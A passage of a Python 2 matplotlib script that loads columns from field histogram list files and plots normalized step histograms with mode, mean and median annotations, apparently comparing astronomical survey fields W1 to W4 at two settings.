plt.setp(plt.xticks()[1], rotation=90)
subplot = 6
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=13
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(458)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(458)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^3}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 7
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=15
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(459)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(459)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^3_{rms}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 8
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=17
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,11)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,11)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{z}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 9
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=19
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,12)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,12)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
